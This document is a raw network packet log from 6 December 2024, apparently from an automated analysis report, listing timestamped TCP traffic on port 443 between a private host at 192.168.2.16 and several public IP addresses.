                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.048662901 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.048681021 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.048752069 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.048759937 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.048823118 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.055346966 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.055363894 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.055427074 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.055438995 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.055505037 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.060079098 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.060094118 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.060146093 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.060157061 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.060252905 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.070591927 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.070679903 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.070877075 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.070894003 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071119070 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071141005 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071157932 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071165085 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071208954 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.071919918 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.080873966 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.080936909 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.080951929 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.090699911 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.090774059 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.090785980 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.136924028 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.159689903 CET49742443192.168.2.163.164.182.6
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.159724951 CET443497423.164.182.6192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.159785032 CET49742443192.168.2.163.164.182.6
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.160012007 CET49742443192.168.2.163.164.182.6
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.160029888 CET443497423.164.182.6192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.163388014 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.163649082 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.163657904 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.164011955 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.164082050 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.164841890 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.164908886 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.165044069 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.165101051 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.165201902 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.183826923 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.183856010 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.183993101 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.184005022 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.184075117 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190361977 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190377951 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190540075 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190615892 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190625906 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.190680027 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197762012 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197779894 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197839022 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197849989 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197901011 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.197901011 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.205240011 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.205260992 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.205348969 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.205365896 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.205420017 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.207331896 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.212234020 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.212255955 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.212337017 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.212347984 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.212397099 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.214931965 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.214946032 CET44349736216.137.52.111192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.219818115 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.219835997 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.219949961 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.219960928 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.220005989 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226286888 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226304054 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226351976 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226361036 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226409912 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.226409912 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.230926037 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.230937004 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233748913 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233767033 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233820915 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233831882 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233864069 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.233896017 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.261935949 CET49736443192.168.2.16216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.262530088 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.262590885 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.262603998 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.266925097 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.268382072 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.268399000 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.275096893 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.275198936 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.275211096 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.290987015 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.291096926 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.291187048 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.291194916 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.291249037 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.299144030 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.307275057 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.307425976 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.307491064 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.307498932 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.307564020 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.315475941 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.323654890 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.323748112 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.323762894 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.331773043 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.331851006 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.331861973 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.338501930 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.338560104 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.338572979 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.344809055 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.344918013 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.344923973 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375256062 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375284910 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375355005 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375370026 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375427961 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.375427961 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.382400036 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.382419109 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.382497072 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.382508993 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.382559061 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.388942957 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.388956070 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.389967918 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.389983892 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.390048981 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.390058994 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.390104055 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.390104055 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.396997929 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.397016048 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.397092104 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.397102118 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.397125006 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.397177935 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404026985 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404047012 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404128075 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404138088 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404176950 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.404200077 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.410984039 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.411000967 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.411068916 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.411077976 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.411453009 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.418386936 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.418404102 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.418498993 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.418508053 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.418572903 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.425923109 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.425940037 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.426090956 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.426101923 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.426167011 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.437060118 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.454476118 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486202002 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486221075 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486249924 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486263037 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486320972 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486335993 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486345053 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486367941 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486386061 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486386061 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.486445904 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515713930 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515722036 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515748024 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515757084 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515784025 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515801907 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515832901 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.515855074 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541800022 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541809082 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541831970 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541893959 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541903973 CET44349735151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541953087 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.541987896 CET49735443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635202885 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635216951 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635241985 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635310888 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635329962 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635340929 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.635509014 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.642596006 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.642613888 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.642688990 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.642699957 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.642764091 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.647943974 CET4434973952.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.648283005 CET49739443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.648293972 CET4434973952.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649151087 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649168968 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649332047 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649341106 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649343967 CET4434973952.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649418116 CET49739443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.649631023 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.650440931 CET49739443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.650506020 CET4434973952.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.650655031 CET49739443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.650671959 CET4434973952.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.656621933 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.656646013 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.656738997 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:23.656738997 CET49727443192.168.2.16151.101.2.152
